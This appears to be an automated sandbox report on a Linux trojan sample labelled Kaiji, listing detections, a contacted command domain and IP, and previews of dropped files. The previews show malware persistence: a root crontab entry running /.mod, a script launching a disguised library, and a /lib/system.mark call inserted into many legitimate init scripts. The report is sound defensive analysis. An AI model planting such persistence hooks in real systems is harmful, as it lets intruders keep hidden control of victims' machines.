Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ausNOyj9by.elf	32%	ReversingLabs	Linux.Trojan.Kaiji
ausNOyj9by.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
/.mod	0%	ReversingLabs
/etc/init.d/acpid	0%	ReversingLabs
/etc/init.d/alsa-utils	0%	ReversingLabs
/etc/init.d/anacron	0%	ReversingLabs
/etc/init.d/apparmor	0%	ReversingLabs
/etc/init.d/avahi-daemon	0%	ReversingLabs
/etc/init.d/bluetooth	0%	ReversingLabs
/etc/init.d/console-setup.sh	0%	ReversingLabs
/etc/init.d/cups	0%	ReversingLabs
/etc/init.d/cups-browsed	0%	ReversingLabs
/etc/init.d/dbus	0%	ReversingLabs
/etc/init.d/dns-udp4	0%	ReversingLabs
/etc/init.d/irqbalance	0%	ReversingLabs
/etc/init.d/keyboard-setup.sh	0%	ReversingLabs
/etc/init.d/kmod	0%	ReversingLabs
/etc/init.d/rsync	0%	ReversingLabs
/etc/init.d/saned	0%	ReversingLabs
/etc/init.d/screen-cleanup	0%	ReversingLabs
/etc/init.d/spice-vdagent	0%	ReversingLabs
/etc/init.d/ufw	0%	ReversingLabs
/etc/init.d/unattended-upgrades	0%	ReversingLabs
/etc/init.d/uuidd	0%	ReversingLabs
/etc/profile.d/bash.cfg.sh	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://html4/loose.dtd	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
botbot.ddosvps.cc	209.141.53.247	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	ausNOyj9by.elf	false	Avira URL Cloud: safe	unknown
http://.css	ausNOyj9by.elf	false	Avira URL Cloud: safe	unknown
http://.jpg	ausNOyj9by.elf	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
209.141.53.247	botbot.ddosvps.cc	United States		53667	PONYNETUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
209.141.53.247	IMG_62100_41600pdf.exe	Get hash	malicious	AgentTesla	Browse	209.141.53.247/nel-1/inc/56ee82c6804416.php
209.141.53.247	IMG2115600269pdf.exe	Get hash	malicious	AgentTesla	Browse	209.141.53.247/nel-1/inc/56ee82c6804416.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
botbot.ddosvps.cc	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse	209.141.53.247

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PONYNETUS	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	209.141.57.51-x86-2024-07-01T10_22_46.elf	Get hash	malicious	Gafgyt, Mirai	Browse	209.141.57.51
	209.141.57.51-mips-2024-07-01T10_22_47.elf	Get hash	malicious	Gafgyt, Mirai	Browse	209.141.57.51
	BVwjyOTKbI.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	107.189.29.207
	dqQPx7jLP8.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	107.189.29.207
	dREJ0R0Ryy.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	107.189.29.207
	hr4p2xQJR2.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	107.189.29.207
	Dv2eb8QXJD.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	107.189.29.207

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/alsa-utils	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
/etc/init.d/acpid	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
/.mod	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
	adm64	Get hash	malicious	Unknown	Browse

Created / dropped Files

/.mod

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.9931325576478587
Encrypted:	false
SSDEEP:	3:TKH/LQP5r:8M1
MD5:	77037D22D4F473F068BCE3E3318ACB01
SHA1:	8AB05FF9A8D9D73E2B23643B39D67EA1FF7A6418
SHA-256:	2F34A08D31571167FB11C6BA96496246219E44403A091B7F010B4C5559CB542B
SHA-512:	AE29513E81C527D8D27EF4CFE69E8D357632BA9AD944F7634D638DA486F8ABBDBD3181164C297A2AA3053D2BA46A5FB19471B5E809D2BB52996E4E2D312DF334
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse Filename: adm64, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/bash./usr/lib/libgdi.so.0.8.2

/etc/.cfg

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	171
Entropy (8bit):	3.798798508425555
Encrypted:	false
SSDEEP:	3:0dkTLQKTBWTsbGqdtbGqYwZWNUdYXRGXGOaYXRGXBHUkDzYd8dkTLQKTBWTsbGqV:0d4MIBVD3DYwiUgRGWARGWkvYd8d4MI9
MD5:	DD788627B7A838D5779BB2747FF2F488
SHA1:	1F48BDC30B95DB0B65706B028BDCEC7DBEAAE714
SHA-256:	2E335B60F725088705E6510B3BF4CE60404BEFF41DA4A27C96F009B92F48D37F
SHA-512:	8363A8C6EA0607252B9A57562531D215EEB0D7D318CB5ADDD5ADAB89FBC311069E2CA177E01D5EC96472AE09AAAD48E5C690702AA88DF79BA92D6FDEA6B57766
Malicious:	false
Reputation:	low
Preview:	e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263f618.e74ed74ec12818ace24ce20ec12818ace24ce20edf3910b3fc6e8618.e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263f618.

/etc/crontab

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.000961982762677
Encrypted:	false
SSDEEP:	3:HFdtKeIBFv:l6eIBV
MD5:	6B13F24B625DC5B832A4AE80CFAB7DDA
SHA1:	8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
SHA-256:	AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
SHA-512:	76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/1 * * * root /.mod .

/etc/init.d/acpid

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2304
Entropy (8bit):	5.101745776620701
Encrypted:	false
SSDEEP:	48:9tdVEA2+3MPMiOBdxAEGbsbcq1himLHLHmvgjWL:9tdVEA2+3MPi90Qbcq1Q4Hrmvt
MD5:	6BBECC4CA13C3007B79B315AD5B8EB33
SHA1:	E32443A6D19709D269DFD58D5D48F23192F8ED82
SHA-256:	98C12A01C2E5F562B14E931C9B503824429C82E088BA06BA43A6313565DB15DE
SHA-512:	29E15DE525FB44D5823429C80280CBF91592A546A5778EA6C056DFE7A390C4DEC2381D22649A110D14DD732473BB9BA7C43D482BAE2E7315120AE8BF9AFE502B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] \|\| exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] \|\| return 0. if [ "$MODULES" = "all" ]; then./lib/system.mark. MODULES="$(sed -rn 's#^(/lib/mod

/etc/init.d/alsa-utils

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	5694
Entropy (8bit):	5.4216099972768905
Encrypted:	false
SSDEEP:	96:iKtDd9/iwtDaLE+E9nw3mFRzF+rv17AypQyhHk5eEkv:iCdld6E+UnKeRB+rv1cyOyZkq
MD5:	25EEDDA5AB2F0AF6683A5A1365EF11A0
SHA1:	76963A11F9F43D6BC6336B0A9610C8668E0F3E79
SHA-256:	37AAA474A96690F2C8BCAD49AB3E31D59D2E4749E2C3EEF7AFCB82406DF6FD81
SHA-512:	3D89F435223BC02FC71722A6FC3A256F30A15168A45DD239B28144593E66653DF43C8F2B0CBFF57BB432D68B26F98173B5F19A2EC6D4D319EDB76994902374CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] \|\| exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

/etc/init.d/anacron

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2124
Entropy (8bit):	4.763929127414264
Encrypted:	false
SSDEEP:	24:aiF8WzzU+LuN5K6YqfO05i1CPeueczZR11s+M8k93ILlfdW6910kF4T0Op:7RzgTNNOGi1eTrzZR1vX5fsKX00+
MD5:	816D2CB2EBBEA0A92840D29E03A3AEF2
SHA1:	DE872E6EAA118E80E9D7A3D1B0CA7C73FD30CB49
SHA-256:	2822A1618EEFA229CB29520923C7E47B61981E11D2028CD62611B18BCE215B87
SHA-512:	5BD322EA5D511EA3A5C7AB832FCCB7DA138C4E352CCD5A140F783B4E196A5C2A0FA33D5DFB54C353A15ADEF42E507D076E66C3C3546EE1E70F538EDA7E52EB7E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron \|\| exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system.mark. exit 1. fi. log_daemon_msg "Starting

/etc/init.d/apparmor

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3826
Entropy (8bit):	5.2527487182090535
Encrypted:	false
SSDEEP:	96:RFCjnn83hjzYn1zJNSNuDNBqNPoNpDbANEFygG9M3zR4hszR4hxRl:Wjn4hjUD9dwl
MD5:	026032FB398BC8D223FFFAC164EC8BDC
SHA1:	2804934FD92CE102B1B64E908DE69B93BDAF0F62
SHA-256:	7EBDBADE1AA7BE3A53549975CD202067C822B137898B91AEE8148A96B80B82D5
SHA-512:	CAD3D3A4EBC3B0B3707B2B8FA5D301F0A8FEFBE78D7064B096A746AB2C0957B2AF29CA4BAFB4603EF0C80380EBC5AD40A7030C7B49BF62164B9DAFECD2C8CFB5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

/etc/init.d/apport

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3050
Entropy (8bit):	5.219163763155702
Encrypted:	false
SSDEEP:	48:jV/OxxHuoBusZABLm/tiUmZdWEdBuSZWg/e/fupMWDGdxboGxz5:jV/OxNDBusZABLm1BmyEbuSZWg2/TWOT
MD5:	8669B5F957342072FF16241BEAA010FD
SHA1:	2E45CEA64AEE1115B5EDBAAC7407B340E47EC7C1
SHA-256:	4DE7B672D754167242FEB9A95D9FA35514114948CFD3567B8BB8BF294F38FB17
SHA-512:	4F426321E4A7123B6E0B19DEF3455CEACBA152FCB5F21A106B809F3B2FB2054300F391DEE9E498749544ED22C8B351AD5E35658813209917672052988D21DF8F
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] \|\| exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME \|\| true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] \|\| mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] \|\| [ -n "`ls /va

/etc/init.d/avahi-daemon

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2453
Entropy (8bit):	4.853742484748698
Encrypted:	false
SSDEEP:	48:9s2V+ig+Ui83MZoJQukTSiVC2/uldA0uv3uKv2ZsGyjyRfg/zsDE7Ed:93oijU4ukTSCu40uv3uKvdJOR4ADHd
MD5:	D6F4FB4B6543A32644DC249C8B6D17A0
SHA1:	C5E44B40458D426759A7EB88B4E55C3ACEF94077
SHA-256:	05EF48FCD09FA3D2BC5C5297F0C9852810F8CBECEA65B0ED26A980D4A5F9D387
SHA-512:	06573A9DC46732518C4BAC856AA7C47B67CB0612BAC0192312A95699DF090782F457EBD138FCD6AE9858F8359209A54EC020115E1EFE450C2EA68D47E4554D30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

/etc/init.d/binfmt-support

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.05188801367894
Encrypted:	false
SSDEEP:	24:ai3V6yXngSBVSBNyj6edNHcBcNlekvx2w5mw+76opC:73ZngWVWNMNH0YlbJ2w4wrJ
MD5:	E6D454B5675D599827B9892551BAF33F
SHA1:	FC529362E60C9D6B0DC86779CFA890B6621FD11E
SHA-256:	37F47BEF4B4D1021E5FDC6BD2F4E90FA9BA3175A83DB2BE094EF68F50A07828B
SHA-512:	3752D5178841DDD8FB9F09BDA4EB0D2FA4391BB951273B3911347AC93135E9A516919E28487724371F6A7CE689BAA053855A3219FC68944751313B0405BA48DE
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system.mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 \|\| exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable \|\| CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable \|\| CODE=$?. log_end_msg $CODE. exi

/etc/init.d/bluetooth

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3071
Entropy (8bit):	5.405379841493847
Encrypted:	false
SSDEEP:	48:71OoPrcMbC/BUUzGrm92+kbM9A5LmiEQoOZoKkkFoM+Zh9YkFoMr4Ote:79TcWC/BUeem92R4q5LRPt5w9VplA
MD5:	85F7B5D11EBD6ABDA86B5DF999F8B6D6
SHA1:	898A95C0302A0D24763D2B10EDC21E921564B1C8
SHA-256:	5A23A691BEE3E1D9A1723811D45030CCAD72CDFDA4AF1C1B5BEC6C027F8831D3
SHA-512:	9BED1FAE531015163C3665B24B678AEA239EC8FA6F92E06CCD044AEAF1B490251B5D7196876FAF1E8C3F2C73E208E268BF9DB6EC9B0535FC7CABA5DC6542F692
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	4.338919117179571
Encrypted:	false
SSDEEP:	24:9lBie8ItKzeBcxlo8/z3ejhGJckS5gzjdJ5ZWkZg7zcOqb6:938yKzYcX/LshGJckS5gJ58kG7A9b6
MD5:	BDD323E45B8053AC9234F45E20BABD66
SHA1:	0141637CE3CE6E3401B3863FED8103F825427055
SHA-256:	44922CED598FFB90525BA2E3285418AE91C2788E4A3DEE0EEE1C3DBF8191AC96
SHA-512:	9BCD74E42D402FCA871BB0B7900821401FA5F229DE02D977D130A48D35BC088BAE03B8FE5D235EA3E1C0309B4B35DF069AA51F496BF8FD5406CDD4BCBCD7B12F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system.mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

/etc/init.d/cron

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3111
Entropy (8bit):	4.912604701068792
Encrypted:	false
SSDEEP:	48:5PMic6MicW4dJIrcz8WD23fK2LAb38ClAATDuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsYDT6MnidD/A3gU
MD5:	C47C5241A33BA37060C9A1A58C167E9E
SHA1:	9ED529B5EFC37F87EF208A43161D198838600310
SHA-256:	6EECCBE60DB542164C6E4F3ADB1291DF01D1502F9A12531D2CCD7A95A88F1712
SHA-512:	B01E7002EF994DF92650E51AA40438F636A8EEE1ABD5E6B6E65F64791CB78C49F412DDD29F82D5840ABDD917CF008713C7D2FBA0E929656ECF713DBB71B255AF
Malicious:	true
Preview:	#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON \|\| exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

/etc/init.d/cryptdisks

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	955
Entropy (8bit):	5.163687656510361
Encrypted:	false
SSDEEP:	12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrEcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKicr/ZkVyKDpjQ
MD5:	F59810FCEAD6967D3484941B757C5D9F
SHA1:	8E78AB09A2E17C4662DE668D65A620CBC4F2A95A
SHA-256:	3ABA882AD020C66D4F94787BB8CA8CE3F1C40CE725B4A8471009B561C0A951D0
SHA-512:	E99CD55831661A71CADD479321623D42FA9E22F8417F812C9357D229D5D3A76EDDA65B97D9A71C00C741EE910335CA3966637C5C6F6D154E8373CA154893CC22
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cryptdisks-early

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.162273569946851
Encrypted:	false
SSDEEP:	12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrEcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CBKYZkVyKDvjQ
MD5:	4D657844653E6118D801763C22C19937
SHA1:	6E7F91D90BAF86647698FA87FACD293CB345CF8B
SHA-256:	DF98C3C25E61F97881A20C39E5F44F544994FB3C56ACBBA6BE5F4BFEB6FD359E
SHA-512:	7915008586A4E3F57F8334E94F7A61E4FA3B51981AF2E0806B7AD2D9E0E6BBF8B321A3389D5A834EB73BF99957102A29DDF24841AA6D4E3354517A6668763CAA
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks-early {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cups

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2856
Entropy (8bit):	5.228297603931064
Encrypted:	false
